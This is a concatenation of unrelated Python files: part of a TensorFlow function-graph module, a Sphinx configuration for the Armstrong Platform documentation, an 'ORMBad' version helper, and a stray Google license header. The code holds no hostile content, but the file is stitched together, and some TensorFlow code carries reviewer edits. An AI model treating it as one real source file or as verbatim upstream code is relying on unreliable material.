    return hasher.hexdigest()[:8]

  def add_to_graph(self, g):
    """Adds this function into the graph g."""
    self._create_definition_if_needed()

    # Adds this function into 'g'.
    # pylint: disable=protected-access
    if context.executing_eagerly():
      context.context().add_function_def(self.definition)
    else:
      g._add_function(self)
    # pylint: enable=protected-access

    # Ensures related sub-routines are defined in 'g', too.
    for f in self._sub_functions.values():
      f.add_to_graph(g)

    # Adds its gradient function, too.
    if self._grad_func:
      self._grad_func.add_to_graph(g)

  def __call__(self, *args, **kwargs):
    self.add_to_graph(ops.get_default_graph())
    # Captured tensors are appended as extra call-time inputs.
    args = [ops.convert_to_tensor(_) for _ in args] + self._extra_inputs
    ret, op = _call(self._signature, *args, **kwargs)

    # Set a hidden attr in 'op' so that gradients_impl can refer back
    # to this _DefinedFunction instance to access python_grad_func.
    assert isinstance(op, ops.Operation)
    setattr(op, "__defun", self)

    if self._shape_func is not None:
      shapes = self._shape_func(op)
      if len(shapes) != len(op.outputs):
        raise ValueError("shape_func produced %d shapes for %d outputs" %
                         (len(shapes), len(op.outputs)))
      for (t, shape) in zip(op.outputs, shapes):
        t.set_shape(shape)
    return ret


class _OverloadedFunction(object):
  """_OverloadedFunction encapsulates an overloaded function.

  _OverloadedFunction maintains a mapping from input types to
  instantiated _DefinedFunction in self._overload.

  """

  def __init__(self,
               func,
               argnames,
               func_name=None,
               grad_func=None,
               python_grad_func=None,
               out_names=None,
               **kwargs):
    """Creates an _OverloadedFunction.

    Args:
      func:  A python callable which constructs a tf function body.
      argnames: A list of strings for function argument names.
      func_name: The function name. Defaults to None, in which case it is
        derived from 'func'.
      grad_func: This function's gradient function, if not None. Defaults
        to None.
      python_grad_func: A python callable implementing the gradient of
        the function python-side.
      out_names: A list of strings for the function return value names.
      **kwargs: The keyword arguments. **kwargs is passed to every call
        site of this function.

    Raises:
      ValueError: The function definition is invalid.

    """
    self._func = func
    self._argnames = argnames
    self._func_name = func_name
    # An overloaded function's gradient must itself be overloaded so it
    # can be instantiated per concrete input-type signature.
    assert grad_func is None or isinstance(grad_func, _OverloadedFunction)
    self._grad_func = grad_func
    self._python_grad_func = python_grad_func
    self._out_names = out_names
    self._extra_kwargs = kwargs
    # Maps stringified input-type list -> _DefinedFunction.
    self._overload = {}

  def instantiate(self, input_types):
    """Instantiate this function given input argument types.

    Args:
      input_types: A list of data types for the inputs.

    Returns:
      _DefinedFunction for the given input types.

    """
    # Stringify the type list.
    key = _type_list_to_str(input_types)
    defined = self._overload.get(key)
    if not defined:
      # If not defined yet, define the function given the input types.
      name = self._func_name
      if name is not None:
        name = "_".join([name, key])
      defined = _DefinedFunction(
          self._func,
          self._argnames,
          input_types,
          name,
          None,
          self._python_grad_func,
          out_names=self._out_names,
          **self._extra_kwargs)
      _ = defined.name  # Fully instantiate the function definition.
      if self._grad_func:
        # If _grad_func is given, it is another
        # _OverloadedFunction. We need to instantiate it with the
        # right input types.
        output_types = [
            dtypes.DType(_.type) for _ in defined._signature.output_arg  # pylint: disable=protected-access
        ]
        # pylint: disable=protected-access
        defined._grad_func = self._grad_func.instantiate(input_types +
                                                         output_types)
        # pylint: enable=protected-access
      self._overload[key] = defined
    return defined

  def __call__(self, *args, **kwargs):
    input_types = []
    args = list(args)
    for (i, x) in enumerate(args):
      x = ops.convert_to_tensor(x)
      if not isinstance(x, ops.Tensor):
        raise ValueError("Expect a Tensor but get ", x)
      input_types.append(x.dtype)
      args[i] = x
    # Dispatch to the (possibly newly created) _DefinedFunction matching
    # the concrete dtypes of the arguments.
    return self.instantiate(input_types)(*args, **kwargs)


class _FuncGraph(ops.Graph):
  """A helper for constructing a function.

  _FuncGraph overrides ops.Graph's create_op() so that we can keep
  track of all inputs into every op created inside the function.  If
  any input is from other graphs, we keep track of it in self.capture
  and substitute the input with a place holder.

  Each captured input's corresponding place holder is converted into a
  function argument and the caller passes in the captured tensor.
  """

  def __init__(self, name, capture_by_value, *args, **kwargs):
    super(_FuncGraph, self).__init__(*args, **kwargs)
    self._capture_by_value = capture_by_value
    self._building_function = True
    # The graph that was the default when this _FuncGraph was created;
    # captured variables are hoisted into it (see getvar).
    self._outer_graph = ops.get_default_graph()
    self._vscope = vs.get_variable_scope()
    self._old_custom_getter = self._vscope.custom_getter

    # The name of the function.
    self.name = name
    # Placeholder tensors representing the inputs to this function. The tensors
    # are in this _FuncGraph.
    self.inputs = []
    # Tensors that will be returned by this function. The tensors are in this
    # _FuncGraph.
    self.outputs = []
    # Maps external tensor -> internal tensor (e.g. input placeholder).
    self._captured = {}
    # The external tensors that have been captured as inputs and must be passed
    # to this function (empty if capturing by value, otherwise these are the
    # keys of _captured).
    self.extra_inputs = []
    # Input placeholders that have been added for captured values (empty if
    # capturing by value).
    self.extra_args = []
    # Captured variables.
    # TODO(skyewm): is this needed?
    self.extra_vars = []

  # pylint: disable=g-doc-return-or-yield

  @tf_contextlib.contextmanager
  def container(self, container_name):
    """Returns a context manager that specifies the resource container to use.

    Overridden from `tf.Graph` to update both the init_scope container
    and the present inner container. This is necessary to make sure setting
    containers applies correctly both to created variables and to stateful
    ops.

    Args:
      container_name: container name string.

    Returns:
      A context manager for defining resource containers for stateful ops,
        yields the container name.
    """
    original_container = self._container
    # pylint: disable=protected-access
    with ops.init_scope():
      original_init_container = ops.get_default_graph()._container
    try:
      self._container = container_name
      with ops.init_scope():
        ops.get_default_graph()._container = container_name
      yield self._container
    finally:
      # Restore both containers even if the body raised.
      self._container = original_container
      with ops.init_scope():
        ops.get_default_graph()._container = original_init_container
    # pylint: enable=protected-access

  # pylint: enable=g-doc-return-or-yield

  def getvar(
      self,
      getter,
      name,
      shape=None,
      dtype=None,
      initializer=None,
      reuse=None,
      trainable=True,
      collections=None,  # pylint: disable=redefined-outer-name
      use_resource=None,
      **kwargs):
    """A custom variable getter."""
    # Here, we switch the default graph to the outer graph and ask the
    # variable scope in which the function is defined to give us the
    # variable. The variable is stashed in extra_vars and returned to
    # the caller.
    #
    # We capture these variables so that the variable definition is
    # hoisted upward to the outer most graph.
    with self._outer_graph.as_default():
      # pylint: disable=protected-access
      var = self._vscope.get_variable(
          vs._get_default_variable_store(),
          name,
          shape=shape,
          dtype=dtype,
          initializer=initializer,
          reuse=reuse,
          trainable=trainable,
          collections=collections,
          use_resource=use_resource)
      self.extra_vars.append(var)
      if isinstance(var, resource_variable_ops.ResourceVariable):
        # For resource-based variables read the variable outside the function
        # and pass in the value. This ensures that the function is pure and
        # differentiable. TODO(apassos) this may have performance problems if
        # the function will only do embedding lookups on the variable.
        return var.value()
      return var

  def create_op(self, op_type, inputs, data_types, **kwargs):
    # Any input that lives outside this graph (or is an eager tensor) is
    # replaced by its captured counterpart before the op is created.
    for i, x in enumerate(inputs):
      if isinstance(x, ops.EagerTensor) or x.graph is not self:
        inputs[i] = self.capture(x)
    return super(_FuncGraph, self).create_op(op_type, inputs, data_types,
                                             **kwargs)

  def capture(self, tensor, name=None):
    """Adds the given tensor to this graph and returns the captured tensor."""
    if tensor in self._captured:
      # Captured already.
      return self._captured[tensor]
    elif self._capture_by_value:
      return self._add_tensor_and_parents(tensor)
    else:
      return self._capture_tensor_as_extra_input(tensor, name)

  def _capture_tensor_as_extra_input(self, tensor, name=None):
    # Substitute with a placeholder.
    self.extra_inputs.append(tensor)
    # Hoist the new input placeholder out of any control flow context
    # we're currently in.
    with ops.control_dependencies(None):
      ph = array_ops.placeholder(
          tensor.dtype, shape=tensor.get_shape(), name=name)
    # pylint: disable=protected-access
    if ops._USE_C_SHAPES:
      # Propagate resource/variant handle data to the placeholder so shape
      # inference keeps working for ops that consume it.
      if isinstance(tensor, ops.EagerTensor):
        handle_data = tensor._handle_data
        if handle_data:
          handle_data = handle_data.SerializeToString()
      else:
        handle_data = c_api.GetHandleShapeAndType(tensor.graph._c_graph,
                                                  tensor._as_tf_output())

      if handle_data:
        c_api.SetHandleShapeAndType(ph.graph._c_graph, ph._as_tf_output(),
                                    compat.as_bytes(handle_data))
    else:
      ph._handle_data = tensor._handle_data
    # pylint: enable=protected-access
    self.inputs.append(ph)
    self._captured[tensor] = ph
    self.extra_args.append(ph)
    if _is_guaranteed_const(tensor):
      with ops.control_dependencies(None):
        return array_ops.guarantee_const(ph)
    else:
      return ph

  def _add_tensor_and_parents(self, tensor):
    op = self._add_op_and_parents(tensor.op)
    return op.outputs[tensor.value_index]

  def _add_op_and_parents(self, op):
    # Recursively copies `op` and its input subgraph into this graph
    # (capture-by-value mode). Stateful ops and placeholders cannot be
    # copied because their values are not reproducible inside the body.
    # pylint: disable=protected-access
    op_def = graph_to_function_def._get_op_def(op)
    # pylint: enable=protected-access
    if op_def.is_stateful:
      raise ValueError("Cannot capture a stateful node (name:%s, type:%s) "
                       "by value." % (op.name, op.type))
    elif op.type in ("Placeholder", "PlaceholderV2"):
      raise ValueError("Cannot capture a placeholder (name:%s, type:%s) "
                       "by value." % (op.name, op.type))

    captured_inputs = [self._add_tensor_and_parents(x) for x in op.inputs]

    captured_op = self.create_op(
        op.type,
        captured_inputs, [o.dtype for o in op.outputs],
        name=op.name,
        attrs=op.node_def.attr,
        op_def=op_def)

    for t, captured_t in zip(op.outputs, captured_op.outputs):
      self._captured[t] = captured_t

    return captured_op


def func_graph_from_py_func(func, arg_names, arg_types, name=None,
                            capture_by_value=False, device=None,
                            colocation_stack=None, container=None,
                            collections_ref=None, arg_shapes=None):
  """Returns a _FuncGraph generated from `func`.

  Args:
    func: A Python callable which constructs a TF function body. The arguments
      must correspond to `arg_types`. Returns a value or list/tuple of values.
      No returned value can be None.
    arg_names: A sequence of strings for the function argument names.
    arg_types: A sequence of the function's argument types.
    name: The function name. If None, the name is derived from `func`.
    capture_by_value: boolean. If True, captured values will be copied into the
      function body.
    device: device name or function.
    colocation_stack: A colocation stack (list) the _FuncGraph should use.
    container: A container name the _FuncGraph should start with.
    collections_ref: A reference to a collections dict the _FuncGraph should
      use internally.
    arg_shapes: A sequence of the function's argument shapes.

  Returns:
    A _FuncGraph.

  Raises:
    ValueError: if func returns None.
  """
  if not name:
    name = function_utils.get_func_name(func)
  func_graph = _FuncGraph(name, capture_by_value)

  # Everything created below is recorded into func_graph (and optionally
  # pinned to `device`).
  with func_graph.as_default(), ops.device(device):
    # pylint: disable=protected-access
    if collections_ref is not None:
      func_graph._collections = collections_ref
    if container is not None:
      func_graph._container = container
    if colocation_stack is not None:
      func_graph._colocation_stack = colocation_stack
    # pylint: enable=protected-access

    # Unknown shapes by default; arg_shapes only overrides when provided.
    if arg_shapes is None:
      arg_shapes = [None] * len(arg_types)

    # Create placeholders for the function arguments.
    for (argname, argtype, argshape) in zip(arg_names, arg_types, arg_shapes):
      argholder = array_ops.placeholder(argtype, shape=argshape, name=argname)
      func_graph.inputs.append(argholder)
    # Call func and gather the output tensors.
    # NOTE(review): func_graph.getvar presumably routes variable creation and
    # lookup through the function graph's capture machinery — it is defined on
    # _FuncGraph outside this view; confirm before relying on it.
    with vs.variable_scope("", custom_getter=func_graph.getvar):
      outputs = func(*func_graph.inputs)

    # There is no way of distinguishing between a function not returning
    # anything and a function returning None in Python.
    # We need to allow the former and ideally want to forbid the latter as
    # it is most likely user error.
    # TODO(iga): Consider adding a @NoOutput decorator on top of @Defun to
    # allow users to explicitly mark the function as not returning anything.
    # For now, we allow a single None return and interpret it as a function
    # with no output.
    if outputs is None:
      outputs = []
    else:
      # If func only returned one value, make it a tuple.
      if not isinstance(outputs, (list, tuple)):
        outputs = (outputs,)
      if any([_ is None for _ in outputs]):
        raise ValueError("Function can not return None.")
    # Ensures each output is a Tensor in the function graph.
    outputs = [ops.convert_to_tensor(t) for t in outputs]
    # An output may live in an outer graph (the `t.graph is not func_graph`
    # case); capture() pulls such tensors into func_graph.
    outputs = [func_graph.capture(t) if t.graph is not func_graph else t
               for t in outputs]
    func_graph.outputs = outputs
  return func_graph


def _is_guaranteed_const(tensor):
  """Determines whether `tensor` is guaranteed to be a constant.

  A tensor is guaranteed to be a constant if either it was produced by
  a `GuaranteeConst` op or if all of its children are guaranteed to be
  constants.

  Args:
    tensor: The tensor for which to determine const-ness.

  Returns:
    True if `tensor` is guaranteed to be a constant, False otherwise.
  """

  if isinstance(tensor, ops.EagerTensor):
    return False

  def _produces_guarantee_const(op):
    return op.node_def.op == "GuaranteeConst"

  known_const_ops = set()

  def _all_inputs_known_const(op):
    # An op whose inputs are all guaranteed constants is itself a constant.
    # Ops without inputs do not qualify.
    return bool(op.inputs) and all(
        inp.op in known_const_ops for inp in op.inputs)

  seen = set()
  # Iterative DFS. Each entry is (op, leaving): leaving=False means the op's
  # inputs still need to be examined; leaving=True means every input has been
  # classified and the op itself can now be judged.
  pending = [(tensor.op, False)]
  while pending:
    op, leaving = pending.pop()
    if leaving:
      if _all_inputs_known_const(op):
        known_const_ops.add(op)
      continue
    seen.add(op)
    if _produces_guarantee_const(op):
      known_const_ops.add(op)
      continue

    # Revisit this op after all of its inputs have been checked.
    pending.append((op, True))
    for inp in op.inputs:
      if inp.op not in seen:
        pending.append((inp.op, False))
  return tensor.op in known_const_ops


def _call(sig, *inputs, **kwargs):
  """Adds a node calling a function.

  This adds a `call` op to the default graph that calls the function
  of signature `sig`, passing the tensors in `inputs` as arguments.
  It returns the outputs of the call, which are one or more tensors.

  `sig` is an `OpDef` proto describing the function's signature (for
  example, the `definition.signature` of a `_DefinedFunction`).

  You can pass an optional keyword parameter `name=string` to name the
  added operation.

  You can pass an optional keyword parameter `noinline=True|False` to
  instruct the runtime not to inline the function body into the call
  site.

  Args:
    sig: OpDef proto. The signature of the function.
    *inputs: arguments to the function.
    **kwargs: Optional keyword arguments.  Can only contain 'name' or
        'noinline'.

  Returns:
     A 2-element tuple. First element: a Tensor if the function returns a
     single value; a tuple of Tensors if the function returns multiple values;
     the Operation if the function returns no values. Second element: the
     Operation.

  Raises:
    ValueError: if the arguments are invalid.
  """
  if len(inputs) != len(sig.input_arg):
    raise ValueError("Expected number of arguments: %d, received: %d" % (len(
        sig.input_arg), len(inputs)))
  name = kwargs.pop("name", None)
  g = ops.get_default_graph()
  func_name = sig.name
  # Remaining kwargs (e.g. 'noinline') become attrs on the call op.
  attrs = _parse_kwargs_as_attrs(func_name, **kwargs)
  output_types = [dtypes.DType(x.type) for x in sig.output_arg]
  with ops.name_scope(name, func_name, inputs) as name:
    op = g.create_op(
        func_name,
        list(inputs),
        output_types,
        name=name,
        attrs=attrs,
        op_def=sig,
        compute_shapes=False)  # shape inference is skipped for this op
  if op.outputs:
    if len(op.outputs) == 1:
      ret = op.outputs[0]
    else:
      ret = tuple(op.outputs)
  else:
    # A function with no outputs: hand back the Operation itself.
    ret = op
  return ret, op


def _from_definition(fdef, grad_func=None):
  """Creates a _DefinedFunction initialized from a FunctionDef proto.

  Args:
    fdef: a FunctionDef
    grad_func: a _DefinedFunction or None

  Returns:
    A _DefinedFunction representing fdef
  """
  # TODO(iga): This method does major surgery on _DefinedFunction.
  # Make it a named constructor using @classmethod of _DefinedFunction.

  sig = fdef.signature
  # No Python callable is available (or needed) here: the FunctionDef already
  # fully describes the function, so _DefinedFunction._func stays None.
  arg_names = [arg.name for arg in sig.input_arg]
  arg_types = tuple(dtypes.as_dtype(arg.type) for arg in sig.input_arg)
  # FunctionDefs carry no python gradient function, so even if the original
  # _DefinedFunction had one it cannot be restored here.
  output_names = [arg.name for arg in sig.output_arg]
  result = _DefinedFunction(None, arg_names, arg_types, sig.name, grad_func,
                            None, output_names)
  # pylint: disable=protected-access
  result._c_func = c_api_util.ScopedTFFunction(
      c_api.TF_FunctionImportFunctionDef(fdef.SerializeToString()))
  result._extra_inputs = []
  # pylint: enable=protected-access

  return result


def _from_library(lib):
  """Creates _DefinedFunctions initialized from a FunctionDefLibrary proto.

  This method handles assigning the correct gradient functions to each
  function.

  Args:
    lib: a FunctionDefLibrary

  Returns:
    A list of _DefinedFunctions

  Raises:
    ValueError: `lib` is invalid
  """
  if not lib.function and not lib.gradient:
    return []

  # Map each function name to its FunctionDef proto.
  funcs = {fdef.signature.name: fdef for fdef in lib.function}

  # Every name mentioned by a GradientDef must have a FunctionDef.
  for gdef in lib.gradient:
    for referenced in (gdef.function_name, gdef.gradient_func):
      if referenced not in funcs:
        raise ValueError("FunctionDefLibrary missing '%s' FunctionDef\n%s" %
                         (referenced, str(lib)))

  # function name -> gradient function name (None when no gradient).
  func_to_grad = collections.defaultdict(lambda: None)
  # gradient function name -> names of functions having that grad function.
  grad_to_funcs = collections.defaultdict(list)

  for gdef in lib.gradient:
    func_to_grad[gdef.function_name] = gdef.gradient_func
    grad_to_funcs[gdef.gradient_func].append(gdef.function_name)

  # Seed processing with functions that have no gradient function; a function
  # can only be built once its gradient function (if any) has been built.
  pending = [
      fdef for fdef in lib.function if func_to_grad[fdef.signature.name] is None
  ]
  if not pending:
    raise ValueError(
        "FunctionDefLibrary contains cyclic gradient functions!\n" + str(lib))

  # function name -> _DefinedFunction
  initialized = {}
  while pending:
    fdef = pending.pop()
    name = fdef.signature.name

    grad = initialized.get(func_to_grad[name])
    if func_to_grad[name]:
      assert grad
    initialized[name] = _from_definition(fdef, grad_func=grad)

    # Functions whose gradient is `name` are now unblocked.
    pending.extend(funcs[dependent] for dependent in grad_to_funcs[name])

  return initialized.values()


def _get_experimental_kwarg_as_attr(attr_name, value):
  """Converts a python value into the corresponding AttrValue proto."""
  # bool must be tested before int: bool is a subclass of int in Python.
  if isinstance(value, bool):
    return attr_value_pb2.AttrValue(b=value)
  if isinstance(value, int):
    return attr_value_pb2.AttrValue(i=value)
  if isinstance(value, float):
    return attr_value_pb2.AttrValue(f=value)
  if isinstance(value, str):
    return attr_value_pb2.AttrValue(s=compat.as_bytes(value))
  raise ValueError("Unsupported attribute type for %s with type %s" %
                   (attr_name, type(value)))


def _parse_kwargs_as_attrs(func_name, **kwargs):
  """Parses **kwargs into a node's attributes."""
  attrs = {}

  noinline = kwargs.pop("noinline", None)
  if noinline is not None:
    attrs["_noinline"] = attr_value_pb2.AttrValue(b=bool(noinline))

  compiled = kwargs.pop("compiled", None)
  separate_compiled_gradients = kwargs.pop("separate_compiled_gradients", None)
  if compiled is not None:
    attrs["_XlaCompile"] = attr_value_pb2.AttrValue(b=bool(compiled))
    attrs["_XlaSeparateCompiledGradients"] = attr_value_pb2.AttrValue(
        b=bool(separate_compiled_gradients))
    # Forward _XlaScope from enclosing context (if set), otherwise create new.
    # pylint: disable=protected-access
    scope_map = ops.get_default_graph()._attr_scope_map
    # pylint: enable=protected-access
    if "_XlaScope" in scope_map:
      attrs["_XlaScope"] = scope_map["_XlaScope"]
    else:
      attrs["_XlaScope"] = attr_value_pb2.AttrValue(
          s=("function_%s" % func_name).encode())

  # Any experimental_* kwarg is forwarded verbatim as an attr.
  for key in [k for k in kwargs if k.startswith("experimental_")]:
    attrs[key] = _get_experimental_kwarg_as_attr(key, kwargs.pop(key))

  if kwargs:
    raise ValueError("Unknown keyword arguments: %s" % kwargs.keys())
  return attrs


def get_extra_vars():
  """Returns the captured variables by the function.

  Returns:
    If the default graph is being used to define a function, the
    returned list of variables are those created inside the function
    body so far. Otherwise, returns an empty list.
  """
  graph = ops.get_default_graph()
  return graph.extra_vars if isinstance(graph, _FuncGraph) else []


def get_extra_inputs():
  """Returns the captured input tensors by the function.

  Returns:
    If the default graph is being used to define a function, the
    returned list of tensors are those accessed inside the function body
    but defined outside the function body so far. Otherwise, returns an
    empty list.
  """
  graph = ops.get_default_graph()
  return graph.extra_inputs if isinstance(graph, _FuncGraph) else []


def get_extra_args():
  """Returns the corresponding function arguments for the captured inputs.

  Returns:
    If the default graph is being used to define a function, the
    returned list of place holders are those used inside the function
    body corresponding those returned by get_extra_inputs(). Otherwise,
    returns an empty list.
  """
  graph = ops.get_default_graph()
  return graph.extra_args if isinstance(graph, _FuncGraph) else []


def _type_list_to_str(types):
  """Encodes a sequence of dtypes as the concatenation of their short codes.

  Args:
    types: a sequence of dtypes, each of which must have an entry in
      `_DTYPE_TO_STR`.

  Returns:
    The per-dtype short codes joined into a single string.

  Raises:
    ValueError: if any dtype has no short code in `_DTYPE_TO_STR`.
  """
  # Generator expressions instead of throwaway list literals; `t` instead of
  # `_`, which conventionally marks an ignored value.
  if any(t not in _DTYPE_TO_STR for t in types):
    raise ValueError("Unsupported dtypes: %s" % types)
  return "".join(_DTYPE_TO_STR[t] for t in types)


# NOTE: The list needs to be extended when more data types are added.
# Maps each dtype to the short code used by _type_list_to_str when building
# a compact signature string; codes must therefore be unique per dtype.
_DTYPE_TO_STR = {
    dtypes.float16: "f16",
    dtypes.float32: "f32",
    dtypes.float64: "f64",
    dtypes.int32: "i32",
    # Fixed: uint8 previously mapped to "i8", colliding with int8 below and
    # making int8/uint8 type lists encode to the same string.
    dtypes.uint8: "u8",
    dtypes.uint16: "u16",
    dtypes.uint32: "u32",
    dtypes.uint64: "u64",
    dtypes.int16: "i16",
    dtypes.int8: "i8",
    dtypes.string: "s",
    dtypes.complex64: "c64",
    dtypes.complex128: "c128",
    dtypes.int64: "i64",
    dtypes.bool: "b",
    dtypes.qint8: "qi8",
    dtypes.quint8: "qu8",
    dtypes.qint16: "qi16",
    dtypes.quint16: "qu16",
    dtypes.qint32: "qi32",
    dtypes.bfloat16: "b16"
}


def function_def_from_tf_function(c_func):
  """Converts a SWIG-wrapped TF_Function* to a FunctionDef proto."""
  # Serialize the C function into a buffer, then parse it back as a proto.
  with c_api_util.tf_buffer() as buf:
    c_api.TF_FunctionToFunctionDef(c_func, buf)
    serialized = c_api.TF_GetBuffer(buf)
  result = function_pb2.FunctionDef()
  result.ParseFromString(compat.as_bytes(serialized))
  return result

# -*- coding: utf-8 -*-
#
# Armstrong Platform documentation build configuration file, created by
# sphinx-quickstart on Mon Sep 26 13:38:48 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys, os
# NOTE(review): sys and os are only needed by the commented-out sys.path
# tweak just below; harmless to keep either way.

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.intersphinx', 'sphinx.ext.todo']

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'Armstrong Platform'
copyright = u'2011, Bay Citizen and Texas Tribune'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '12.03.1'
# The full version, including alpha/beta/rc tags.
release = '12.03.1'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []


# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
# 'armstrong' is a custom theme; Sphinx resolves it via html_theme_path below.
html_theme = 'armstrong'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_themes', ]

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
html_additional_pages = {
    'index': 'index.html',
}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'ArmstrongPlatformDocumentationdoc'


# -- Options for LaTeX output --------------------------------------------------

# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'

# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'ArmstrongPlatformDocumentation.tex', u'Armstrong Platform Documentation Documentation',
   u'Bay Citizen and Texas Tribune', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Additional stuff for the LaTeX preamble.
#latex_preamble = ''

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'armstrongplatformdocumentation', u'Armstrong Platform Documentation Documentation',
     [u'Bay Citizen and Texas Tribune'], 1)
]


# -- Options for Epub output ---------------------------------------------------

# Bibliographic Dublin Core info.
epub_title = u'Armstrong Platform Documentation'
epub_author = u'Bay Citizen and Texas Tribune'
epub_publisher = u'Bay Citizen and Texas Tribune'
epub_copyright = u'2011, Bay Citizen and Texas Tribune'

# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''

# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''

# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''

# A unique identification for the text.
#epub_uid = ''

# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []

# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []

# A list of files that should not be packed into the epub file.
#epub_exclude_files = []

# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3

# Allow duplicate toc entries.
#epub_tocdup = True


# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}

# ormbad.version
# Helper module for ORMBad version information
#
# Author:   Benjamin Bengfort <benjamin@bengfort.com>
# Created:  Thu Aug 13 12:38:42 2015 -0400
#
# Copyright (C) 2015 Tipsy Bear Studios
# For license information, see LICENSE.txt
#
# ID: version.py [] benjamin@bengfort.com $

"""
Helper module for ORMBad version information.
"""

##########################################################################
## Versioning
##########################################################################

# Version components rendered into a dotted string by get_version() below.
# releaselevel must be one of 'alpha', 'beta', or 'final'.
__version_info__ = {
    'major': 0,
    'minor': 1,
    'micro': 0,  # omitted from the version string when 0
    'releaselevel': 'final',
    'serial': 0,  # pre-release number, e.g. the 2 in "0.1a2"
}


def get_version(short=False, info=None):
    """
    Returns the version string computed from the version info.

    Args:
        short: If True, omit the pre-release suffix (e.g. the "a2" in
            "0.1a2") even when the release level is not final.
        info: Optional mapping with 'major', 'minor', 'micro',
            'releaselevel', and 'serial' keys; defaults to the module-level
            ``__version_info__``. Added (backward-compatibly) so the
            formatting logic can be reused and tested with arbitrary data.

    Returns:
        A version string such as "0.1", "1.2.3", or "0.1a2".

    Raises:
        ValueError: if the release level is not 'alpha', 'beta', or
            'final'. An explicit raise replaces the previous ``assert``,
            which would have been silently stripped under ``python -O``.
    """
    if info is None:
        info = __version_info__
    if info['releaselevel'] not in ('alpha', 'beta', 'final'):
        raise ValueError(
            "Invalid release level: %(releaselevel)r" % info)
    vers = ["%(major)i.%(minor)i" % info]
    # A zero micro version is left out entirely (e.g. "0.1", not "0.1.0").
    if info['micro']:
        vers.append(".%(micro)i" % info)
    # Pre-releases get a suffix built from the level's first letter + serial.
    if info['releaselevel'] != 'final' and not short:
        vers.append('%s%i' % (info['releaselevel'][0], info['serial']))
    return ''.join(vers)

#!/usr/bin/python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
